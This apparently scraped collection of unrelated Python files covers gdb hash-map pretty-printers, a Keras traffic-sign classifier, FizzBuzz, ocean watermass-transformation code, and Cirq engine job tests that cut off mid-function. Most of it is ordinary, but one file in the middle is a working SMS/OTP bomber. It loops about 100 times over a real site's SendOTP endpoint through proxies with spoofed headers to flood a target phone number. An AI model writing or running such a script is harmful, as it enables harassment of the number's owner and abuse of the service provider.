def display_hint(self):
return "map"
class NodeSetPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(slot_iterator(self.val), node_set_iterator)
def to_string(self):
return f"gtl::node_hash_set with {int(self.val['size_'])} elements"
def display_hint(self):
return "array"
class ParallelFlatMapPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(parallel_slot_iterator(self.val), flat_map_iterator)
def to_string(self):
return f"gtl::parallel_flat_hash_map with {parallel_size(self.val)} elements"
def display_hint(self):
return "map"
class ParallelFlatSetPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(parallel_slot_iterator(self.val), flat_set_iterator)
def to_string(self):
return f"gtl::parallel_flat_hash_set with {parallel_size(self.val)} elements"
def display_hint(self):
return "array"
class ParallelNodeMapPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(parallel_slot_iterator(self.val), node_map_iterator)
def to_string(self):
return f"gtl::parallel_node_hash_map with {parallel_size(self.val)} elements"
def display_hint(self):
return "map"
class ParallelNodeSetPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(parallel_slot_iterator(self.val), node_set_iterator)
def to_string(self):
return f"gtl::parallel_node_hash_set with {parallel_size(self.val)} elements"
def display_hint(self):
return "array"
def build_pretty_printer():
pp = gdb.printing.RegexpCollectionPrettyPrinter("phmap")
pp.add_printer('flat_hash_map', '^gtl::flat_hash_map<.*>$', FlatMapPrinter)
pp.add_printer('flat_hash_set', '^gtl::flat_hash_set<.*>$', FlatSetPrinter)
pp.add_printer('node_hash_map', '^gtl::node_hash_map<.*>$', NodeMapPrinter)
pp.add_printer('node_hash_set', '^gtl::node_hash_set<.*>$', NodeSetPrinter)
pp.add_printer('parallel_flat_hash_map', '^gtl::parallel_flat_hash_map<.*>$', ParallelFlatMapPrinter)
pp.add_printer('parallel_flat_hash_set', '^gtl::parallel_flat_hash_set<.*>$', ParallelFlatSetPrinter)
pp.add_printer('parallel_node_hash_map', '^gtl::parallel_node_hash_map<.*>$', ParallelNodeMapPrinter)
pp.add_printer('parallel_node_hash_set', '^gtl::parallel_node_hash_set<.*>$', ParallelNodeSetPrinter)
return pp
gdb.printing.register_pretty_printer(gdb.current_objfile(), build_pretty_printer())
|
import glob
import os
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from matplotlib.image import imread
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
# For image from url
from PIL import Image
import requests
from io import BytesIO
# %% Data
def getdata(folder):
files = glob.glob(folder + '/*')
images = np.array([imread(file) for file in files])
labels = np.array([
os.path.basename(file).split('_')[0] for file in files
], dtype=np.int)
return images, labels
# Images and labels
images, labels = getdata('data')
print(labels)
C = len(np.unique(labels))
print('Number of classes: %i' % C)
for i in [0,10,20]:
plt.figure()
plt.imshow(images[i])
plt.show()
# %% Transform to probabilities
# Encode labels to integers corresponding to classes
encoder = LabelEncoder()
labels_int = encoder.fit_transform(labels)
print(labels_int)
# One-hot enconding corresponding to "probabilities"
encoder_onehot = OneHotEncoder(sparse=False)
y = encoder_onehot.fit_transform(labels_int.reshape([-1,1]))
print(y)
# Decode
labels2 = encoder.inverse_transform(np.argmax(y,axis=1))
print('Check decoding')
print(labels)
print(labels2)
# %% Test data
images_test, labels_test = getdata('data_test')
y_test = encoder_onehot.fit_transform(encoder.fit_transform(labels_test).reshape([-1,1]))
# %% Model
print('Shape of input image data')
print(images[0].shape)
# Model
model = tf.keras.Sequential([
tf.keras.layers.Flatten(input_shape=images[0].shape),
tf.keras.layers.Dense(64, 'relu'),
tf.keras.layers.Dense(16, 'relu'),
tf.keras.layers.Dense(C, 'softmax')
])
model.summary()
model.compile(
loss=tf.keras.losses.CategoricalCrossentropy()
,optimizer = 'adam'
,metrics=['accuracy']
)
#%% Evaluate accuracy
# Evaluate
y_m = model.predict(images)
print(y[:3])
print(y_m[:3])
print(np.sum(y_m,axis=1)[:3])
# Compute accuracy
labels_int_m = np.argmax(y_m,axis=1)
print('\nPredicted labels_int at model initialization')
print(labels_int_m)
print('labels_int')
print(labels_int)
correct_events = np.sum(labels_int == labels_int_m)
acc = correct_events/len(labels)
print('Correct events: %i' % correct_events)
print('Accuracy: %.2f' % acc)
# Evaluate
model.evaluate(images,y)
# %% Train
model.fit(images, y, epochs=10, verbose=2)
# %% Evaluate accuracy after training
model.evaluate(images,y)
model.evaluate(images_test,y_test)
# %% Try to predict for a street sign
# Get image
url = 'https://w.grube.de/media/image/7b/5f/63/art_78-101_1.jpg'
response = requests.get(url)
sign = Image.open(BytesIO(response.content))
print(sign)
# Plot
plt.figure()
plt.imshow(sign)
plt.show()
# Resize
sign = sign.resize([20,20])
plt.figure()
plt.imshow(sign)
plt.show()
# Careful: imported image values != as training images
sign = np.array(sign)
print('\nValues at pixel(0,0)')
print(sign[0,0,:])
# Transform to range [0,1]
sign = sign/255
print('\nValues at pixel(0,0)')
print(sign[0,0,:])
# Predict with trained model
y_sign = model.predict(np.array([sign]))
print('\nPredicted probabilities')
print(y_sign)
print(encoder.inverse_transform(np.argmax(y_sign,axis=1)))
|
# fizzbuzz.py
# Write a short program that prints each number from 1 to 100 on a new line.
# For each multiple of 3, print "Fizz" instead of the number.
# For each multiple of 5, print "Buzz" instead of the number.
# For numbers which are multiples of both 3 and 5, print "FizzBuzz" instead of the number.
for i in range(1, 101):
if i % 3 == 0 and i % 5 == 0:
print("FizzBuzz")
elif i % 3 == 0:
print("Fizz")
elif i % 5 == 0:
print("Buzz")
else:
print(i)
|
from dataclasses import dataclass
from sqlalchemy.ext.declarative import as_declarative, declared_attr
@dataclass
@as_declarative()
class Base(object):
@declared_attr
def __tablename__(cls) -> str:
return cls.__name__.lower()
def json(self) -> dict:
dict_base = self.__dict__.copy()
for key in dict_base.copy():
if key.startswith("_"):
del dict_base[key]
return dict_base
|
import xarray as xr
import numpy as np
from xhistogram.xarray import histogram
# Watermass transformation calculation
def _calc_shortwave_penetration(ds,xgrid):
R = 0.58
h1 = 0.35
h2 = 23
# Calculate in 1D
Fps77 = R*np.exp(-ds['depth_i']/h1)+(1-R)*np.exp(-ds['depth_i']/h2)
# Now get a 4D shortwave field
shortwave = ds['sr']*Fps77
# and take the divergence
# (note that for taking the derivative, 'depth' must be positive upward, so reverse the sign)
# (subsequently, reverse the sign so that it is consistent with the other variables)
dsr4d = xgrid.derivative(-shortwave,'Z')
return dsr4d
def _calc_densityflux(FW,Q,S,alpha,beta,Cp=4200):
F = xr.Dataset()
F['heat'] = (alpha/Cp)*Q
F['fw'] = -FW*S*beta
F['total'] = F['heat']+F['fw']
return F
def calc_densityflux(ds,xgrid,penetrative_sw=True):
mask = _create_mask(ds)
if penetrative_sw:
dsr4d = _calc_shortwave_penetration(ds,xgrid)
Q = mask*ds['ht']+dsr4d
else:
Q = mask*(ds['ht']+ds['sr'])
FW = mask*ds['fw']
F = _calc_densityflux(FW,Q,ds['sa'],ds['alpha'],ds['beta'])
return F
def _create_mask(ds):
# Create a 3D mask with 1/dz in the surface and zero elsewhere
if ds['dz'].size != 1:
idz = 1/ds['dz'][0].values
mask = xr.concat([idz*xr.ones_like(ds['sa'].isel(time=0,depth=0)),
xr.zeros_like(ds['sa'].isel(time=0,depth=slice(1,None)))],
dim='depth')
else:
idz = 1/ds['dz'].values
mask = idz*xr.ones_like(ds['sa'].isel(time=0))
return mask
### Watermass transformation calculation
def _calc_watermasstransformation(F,density,b,V,density_edges):
# Discrete volume calculation derived in Appendix 7.5 of Groeskamp et al (2018)
G = xr.Dataset()
for var in F.data_vars:
gFbV = density*b*F[var]*V
nanmask=np.isnan(gFbV)
if 'depth' in density.dims:
intdims = ['lat','lon','depth']
else:
intdims = ['lat','lon']
G[var] = histogram(density.where(~nanmask),bins=[density_edges],weights=gFbV.where(~nanmask),dim=intdims)/np.diff(density_edges)
return G
def calc_watermasstransformation(ds,xgrid,gn_edges,density='gamman',b_ones=False,penetrative_sw=True):
F = calc_densityflux(ds,xgrid,penetrative_sw)
if density=='gamman':
density = ds['gamman']
elif density=='sigma0':
density = ds['sigma0']+1000
ds['b'] = xr.ones_like(ds['b'])
if b_ones:
ds['b'] = xr.ones_like(ds['b'])
G = _calc_watermasstransformation(F,density,ds['b'],ds['vol4d'],gn_edges)
return G
### Storage change calculation
def _calc_dMdt(mass,gamman,gn_edges):
# Augment edges
gn_edges_all = np.concatenate(([np.array(-99999)],gn_edges,[np.array(99999)]))
# Histogram mass
nanmask=np.isnan(gamman)
M_on_gamma = histogram(gamman.where(~nanmask),
bins=[gn_edges_all],
weights=mass.where(~nanmask),
dim=['lat','lon','depth']).transpose()
# To integrate for all volume with temperature greater than a certain value,
# take cumulative sum and reassign the coordinates to align with G
M_on_gamma_cumsum = xr.concat([xr.zeros_like(M_on_gamma.isel({'gamman_bin':0})),
M_on_gamma.cumsum('gamman_bin')],dim='gamman_bin')
# We wish to have the total mass for the volume with temperature greater than that contour,
# So take away the total sum from the cumulative sum to reverse the direction
M_reverse = (M_on_gamma.sum('gamman_bin')-M_on_gamma_cumsum)
# Now we can get rid of the boundary contours, which were there to ensure that all
# of the volume wass captures, and we assign the coordinates to match with G
M = M_reverse.isel(gamman_bin=slice(1,-1)).assign_coords({'gamman_bin':gn_edges})
# Calculate the derivative with respect to time
dMdt = M.diff('time')/(M['time'].diff('time').astype('float')*1E-9)
# The time derivative is align with the start of each month,
# so define a new time coordinate
timenew = M.time[:-1]+(M['time'].shift({'time':-1})-M['time'][:-1])/2
# Assign that coordinate for the time derivative
dMdt = dMdt.assign_coords(time=timenew)
# Rename
dMdt.name = 'dMdt'
return dMdt
def calc_dMdt(ds,gn_edges):
return _calc_dMdt(ds['mass'],ds['gamman'],gn_edges)
### b-factor
# Wrappers for derivative operations in xgcm
def _xgcm_interp_and_derivative(da,xgrid,dim,boundary=None):
# Interpolate to grid cell boundaries
da_i = xgrid.interp(da,dim,boundary=boundary)
# Take the derivative
dadl = xgrid.derivative(da_i,dim,boundary=boundary)
return dadl
def _xgcm_interp_and_derivative_3D(da,xgrid,dims=['X','Y','Z'],boundaries=[None,None,None]):
# Calculate gradients in X, Y and Z
dad1 = _xgcm_interp_and_derivative(da,xgrid,dims[0],boundaries[0])
dad2 = _xgcm_interp_and_derivative(da,xgrid,dims[1],boundaries[1])
dad3 = _xgcm_interp_and_derivative(da,xgrid,dims[2],boundaries[2])
return dad1, dad2, dad3
def _calc_bfactor(T,S,rho,alpha,beta,gamma,xgrid):
# Derivatves in T, S, and gamma
dims = ['X','Y','Z']
boundaries = [None,'extend','extend']
dTdx,dTdy,dTdz = _xgcm_interp_and_derivative_3D(T,xgrid,dims,boundaries)
dSdx,dSdy,dSdz = _xgcm_interp_and_derivative_3D(S,xgrid,dims,boundaries)
dgdx,dgdy,dgdz = _xgcm_interp_and_derivative_3D(gamma,xgrid,dims,boundaries)
# Locally referenced potential density
drdx = rho*(-alpha*dTdx + beta*dSdx)
drdy = rho*(-alpha*dTdy + beta*dSdy)
drdz = rho*(-alpha*dTdz + beta*dSdz)
# Calculate the absolute magnitudes
abs_drd = xr.ufuncs.sqrt(xr.ufuncs.square(drdx)+xr.ufuncs.square(drdy)+xr.ufuncs.square(drdz))
abs_dgd = xr.ufuncs.sqrt(xr.ufuncs.square(dgdx)+xr.ufuncs.square(dgdy)+xr.ufuncs.square(dgdz))
# Calculate ratio
b = abs_drd/abs_dgd
return b
def calc_bfactor(ds,xgrid):
return _calc_bfactor(ds['ct'],ds['sa'],ds['rho'],ds['alpha'],ds['beta'],ds['gamman'],xgrid)
|
import requests
import time
def bombus(number):
r=requests.session()
url="https://www.<redacted>.com/Personalization/SendOTP?mobile={}&phoneCode=91&OTPSource=SIGNIN".format(number)
proxy={'http':'45.7.231.86','http':'66.42.107.87:8080','http':'68.183.99.96:8080'}
headers={"Host":"www.redbus.in",
"Connection": "close",
"Origin": "https://smsbomber.biz",
"User-Agent": "Mozilla/5.0 (X11; Linux 64) AppleWebKit/547.36 (KHTML, like Gecko) Chrome/70.0.3383.203 Safari/337.35",
"DNT": "1",
"Accept": "*/*",
"Referer": "https://smsbomber.biz/bomb.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7",
"Cookie": "jfpj=b538ab3ac87701158bde432b134e431d; country=IND; currency=INR; selectedCurrency=INR; language=en; deviceSessionId=c7352b25-7107-43f2-af58-12e747m85edd; lzFlag=1; bCore=1; defaultCountry=IND"}
print(r.get(url,headers=headers,proxies=proxy).text)
def kill(number):
for i in range(101):
try:
bombus(number)
time.sleep(10)
except:
pass
|
# -*- coding: utf-8 -*-
import unittest
from cwr.parser.encoder.dictionary import InstrumentValueDictionaryEncoder
from cwr.table_value import InstrumentValue
"""
Acknowledgement to dictionary encoding tests.
The following cases are tested:
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
class TestInstrumentValueEncoding(unittest.TestCase):
def setUp(self):
self._encoder = InstrumentValueDictionaryEncoder()
def test_encoded(self):
data = InstrumentValue('BBF', 'Bamboo Flute', 'National/Folk',
'same as Dizi or D\'Tzu')
encoded = self._encoder.encode(data)
self.assertEqual('BBF', encoded['code'])
self.assertEqual('Bamboo Flute', encoded['name'])
self.assertEqual('National/Folk', encoded['family'])
self.assertEqual('same as Dizi or D\'Tzu', encoded['description'])
|
# Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
from unittest import mock
import pytest
from google.protobuf import any_pb2, timestamp_pb2
from google.protobuf.text_format import Merge
import cirq
import cirq_google as cg
from cirq_google.api import v1, v2
from cirq_google.engine import util
from cirq_google.cloud import quantum
from cirq_google.engine.engine import EngineContext
from cirq_google.engine.test_utils import uses_async_mock
@pytest.fixture(scope='session', autouse=True)
def mock_grpc_client():
with mock.patch(
'cirq_google.engine.engine_client.quantum.QuantumEngineServiceClient'
) as _fixture:
yield _fixture
def test_engine():
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
assert job.engine().project_id == 'a'
def test_program():
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
assert job.program().project_id == 'a'
assert job.program().program_id == 'b'
def test_id():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(create_time=timestamp_pb2.Timestamp(seconds=1581515101)),
)
assert job.id() == 'steve'
def test_create_time():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(create_time=timestamp_pb2.Timestamp(seconds=1581515101)),
)
assert job.create_time() == datetime.datetime(
2020, 2, 12, 13, 45, 1, tzinfo=datetime.timezone.utc
)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_update_time(get_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
get_job.return_value = quantum.QuantumJob(
update_time=timestamp_pb2.Timestamp(seconds=1581515101)
)
assert job.update_time() == datetime.datetime(
2020, 2, 12, 13, 45, 1, tzinfo=datetime.timezone.utc
)
get_job.assert_called_once_with('a', 'b', 'steve', False)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_description(get_job):
job = cg.EngineJob(
'a', 'b', 'steve', EngineContext(), _job=quantum.QuantumJob(description='hello')
)
assert job.description() == 'hello'
get_job.return_value = quantum.QuantumJob(description='hello')
assert cg.EngineJob('a', 'b', 'steve', EngineContext()).description() == 'hello'
get_job.assert_called_once_with('a', 'b', 'steve', False)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.set_job_description_async')
def test_set_description(set_job_description):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
set_job_description.return_value = quantum.QuantumJob(description='world')
assert job.set_description('world').description() == 'world'
set_job_description.assert_called_with('a', 'b', 'steve', 'world')
set_job_description.return_value = quantum.QuantumJob(description='')
assert job.set_description('').description() == ''
set_job_description.assert_called_with('a', 'b', 'steve', '')
def test_labels():
job = cg.EngineJob(
'a', 'b', 'steve', EngineContext(), _job=quantum.QuantumJob(labels={'t': '1'})
)
assert job.labels() == {'t': '1'}
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.set_job_labels_async')
def test_set_labels(set_job_labels):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
set_job_labels.return_value = quantum.QuantumJob(labels={'a': '1', 'b': '1'})
assert job.set_labels({'a': '1', 'b': '1'}).labels() == {'a': '1', 'b': '1'}
set_job_labels.assert_called_with('a', 'b', 'steve', {'a': '1', 'b': '1'})
set_job_labels.return_value = quantum.QuantumJob()
assert job.set_labels({}).labels() == {}
set_job_labels.assert_called_with('a', 'b', 'steve', {})
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.add_job_labels_async')
def test_add_labels(add_job_labels):
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=quantum.QuantumJob(labels={}))
assert job.labels() == {}
add_job_labels.return_value = quantum.QuantumJob(labels={'a': '1'})
assert job.add_labels({'a': '1'}).labels() == {'a': '1'}
add_job_labels.assert_called_with('a', 'b', 'steve', {'a': '1'})
add_job_labels.return_value = quantum.QuantumJob(labels={'a': '2', 'b': '1'})
assert job.add_labels({'a': '2', 'b': '1'}).labels() == {'a': '2', 'b': '1'}
add_job_labels.assert_called_with('a', 'b', 'steve', {'a': '2', 'b': '1'})
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.remove_job_labels_async')
def test_remove_labels(remove_job_labels):
job = cg.EngineJob(
'a', 'b', 'steve', EngineContext(), _job=quantum.QuantumJob(labels={'a': '1', 'b': '1'})
)
assert job.labels() == {'a': '1', 'b': '1'}
remove_job_labels.return_value = quantum.QuantumJob(labels={'b': '1'})
assert job.remove_labels(['a']).labels() == {'b': '1'}
remove_job_labels.assert_called_with('a', 'b', 'steve', ['a'])
remove_job_labels.return_value = quantum.QuantumJob(labels={})
assert job.remove_labels(['a', 'b', 'c']).labels() == {}
remove_job_labels.assert_called_with('a', 'b', 'steve', ['a', 'b', 'c'])
def test_processor_ids():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(
scheduling_config=quantum.SchedulingConfig(
processor_selector=quantum.SchedulingConfig.ProcessorSelector(
processor_names=['projects/a/processors/p']
)
)
),
)
assert job.processor_ids() == ['p']
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_status(get_job):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.RUNNING)
)
get_job.return_value = qjob
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
assert job.status() == 'RUNNING'
get_job.assert_called_once()
assert job.execution_status() == quantum.ExecutionStatus.State.RUNNING
def test_failure():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(
state=quantum.ExecutionStatus.State.FAILURE,
failure=quantum.ExecutionStatus.Failure(
error_code=quantum.ExecutionStatus.Failure.Code.SYSTEM_ERROR,
error_message='boom',
),
)
),
)
assert job.failure() == ('SYSTEM_ERROR', 'boom')
def test_failure_with_no_error():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS)
),
)
assert not job.failure()
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_get_repetitions_and_sweeps(get_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
get_job.return_value = quantum.QuantumJob(
run_context=util.pack_any(
v2.run_context_pb2.RunContext(
parameter_sweeps=[v2.run_context_pb2.ParameterSweep(repetitions=10)]
)
)
)
assert job.get_repetitions_and_sweeps() == (10, [cirq.UnitSweep])
get_job.assert_called_once_with('a', 'b', 'steve', True)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_get_repetitions_and_sweeps_v1(get_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
get_job.return_value = quantum.QuantumJob(
run_context=util.pack_any(
v1.program_pb2.RunContext(
parameter_sweeps=[v1.params_pb2.ParameterSweep(repetitions=10)]
)
)
)
with pytest.raises(ValueError, match='v1 RunContext is not supported'):
job.get_repetitions_and_sweeps()
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_get_repetitions_and_sweeps_unsupported(get_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
get_job.return_value = quantum.QuantumJob(
run_context=any_pb2.Any(type_url='type.googleapis.com/unknown.proto')
)
with pytest.raises(ValueError, match='unsupported run_context type: unknown.proto'):
job.get_repetitions_and_sweeps()
def test_get_processor():
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(processor_name='projects/a/processors/p')
)
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert job.get_processor().processor_id == 'p'
def test_get_processor_no_processor():
qjob = quantum.QuantumJob(execution_status=quantum.ExecutionStatus())
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert not job.get_processor()
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_calibration')
def test_get_calibration(get_calibration):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(
calibration_name='projects/a/processors/p/calibrations/123'
)
)
calibration = quantum.QuantumCalibration(
data=util.pack_any(
Merge(
"""
timestamp_ms: 123000,
metrics: [{
name: 'xeb',
targets: ['0_0', '0_1'],
values: [{
double_val: .9999
}]
}, {
name: 't1',
targets: ['0_0'],
values: [{
double_val: 321
}]
}, {
name: 'globalMetric',
values: [{
int32_val: 12300
}]
}]
""",
v2.metrics_pb2.MetricsSnapshot(),
)
)
)
get_calibration.return_value = calibration
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert list(job.get_calibration()) == ['xeb', 't1', 'globalMetric']
get_calibration.assert_called_once_with('a', 'p', 123)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_calibration_async')
def test_calibration__with_no_calibration(get_calibration):
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(
name='projects/project-id/programs/test/jobs/test',
execution_status={'state': 'SUCCESS'},
),
)
calibration = job.get_calibration()
assert not calibration
assert not get_calibration.called
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.cancel_job_async')
def test_cancel(cancel_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
job.cancel()
cancel_job.assert_called_once_with('a', 'b', 'steve')
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.delete_job_async')
def test_delete(delete_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
job.delete()
delete_job.assert_called_once_with('a', 'b', 'steve')
RESULTS = quantum.QuantumResult(
result=util.pack_any(
Merge(
"""
sweep_results: [{
repetitions: 4,
parameterized_results: [{
params: {
assignments: {
key: 'a'
value: 1
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\006'
}]
}
},{
params: {
assignments: {
key: 'a'
value: 2
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\005'
}]
}
}]
}]
""",
v2.result_pb2.Result(),
)
)
)
BATCH_RESULTS = quantum.QuantumResult(
result=util.pack_any(
Merge(
"""
results: [{
sweep_results: [{
repetitions: 3,
parameterized_results: [{
params: {
assignments: {
key: 'a'
value: 1
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\006'
}]
}
},{
params: {
assignments: {
key: 'a'
value: 2
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\007'
}]
}
}]
}],
},{
sweep_results: [{
repetitions: 4,
parameterized_results: [{
params: {
assignments: {
key: 'a'
value: 3
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\013'
}]
}
},{
params: {
assignments: {
key: 'a'
value: 4
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\011'
}]
}
}]
}]
}]
""",
v2.batch_pb2.BatchResult(),
)
)
)
CALIBRATION_RESULT = quantum.QuantumResult(
result=util.pack_any(
Merge(
"""
results: [{
code: ERROR_CALIBRATION_FAILED
error_message: 'uh oh'
token: 'abc'
valid_until_ms: 1234567891000
metrics: {
timestamp_ms: 1234567890000,
metrics: [{
name: 'theta',
targets: ['0_0', '0_1'],
values: [{
double_val: .9999
}]
}]
}
}]
""",
v2.calibration_pb2.FocusedCalibrationResult(),
)
)
)
UPDATE_TIME = datetime.datetime.now(tz=datetime.timezone.utc)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_results(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
data = job.results()
assert len(data) == 2
assert str(data[0]) == 'q=0110'
assert str(data[1]) == 'q=1010'
get_job_results.assert_called_once_with('a', 'b', 'steve')
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_results_iter(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
results = [str(r) for r in job]
assert len(results) == 2
assert results[0] == 'q=0110'
assert results[1] == 'q=1010'
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_results_getitem(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert str(job[0]) == 'q=0110'
assert str(job[1]) == 'q=1010'
with pytest.raises(IndexError):
_ = job[2]
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_batched_results(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = BATCH_RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
data = job.results()
assert len(data) == 4
assert str(data[0]) == 'q=011'
assert str(data[1]) == 'q=111'
assert str(data[2]) == 'q=1101'
assert str(data[3]) == 'q=1001'
get_job_results.assert_called_once_with('a', 'b', 'steve')
data = job.batched_results()
assert len(data) == 2
assert len(data[0]) == 2
assert len(data[1]) == 2
assert str(data[0][0]) == 'q=011'
assert str(data[0][1]) == 'q=111'
assert str(data[1][0]) == 'q=1101'
assert str(data[1][1]) == 'q=1001'
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_batched_results_not_a_batch(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
with pytest.raises(ValueError, match='batched_results'):
job.batched_results()
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_calibration_results(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = CALIBRATION_RESULT
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
data = job.calibration_results()
get_job_results.assert_called_once_with('a', 'b', 'steve')
assert len(data) == 1
assert data[0].code == v2.calibration_pb2.ERROR_CALIBRATION_FAILED
assert data[0].error_message == 'uh oh'
assert data[0].token == 'abc'
assert data[0].valid_until.timestamp() == 1234567891
assert len(data[0].metrics)
assert data[0].metrics['theta'] == {(cirq.GridQubit(0, 0), cirq.GridQubit(0, 1)): [0.9999]}
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_calibration_defaults(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
result = v2.calibration_pb2.FocusedCalibrationResult()
result.results.add()
get_job_results.return_value = quantum.QuantumResult(result=util.pack_any(result))
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
data = job.calibration_results()
get_job_results.assert_called_once_with('a', 'b', 'steve')
assert len(data) == 1
assert data[0].code == v2.calibration_pb2.CALIBRATION_RESULT_UNSPECIFIED
assert data[0].error_message is None
assert data[0].token is None
assert data[0].valid_until is None
assert len(data[0].metrics) == 0
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_calibration_results_not_a_calibration(get_job_results):
qjob = quantum.QuantumJob(
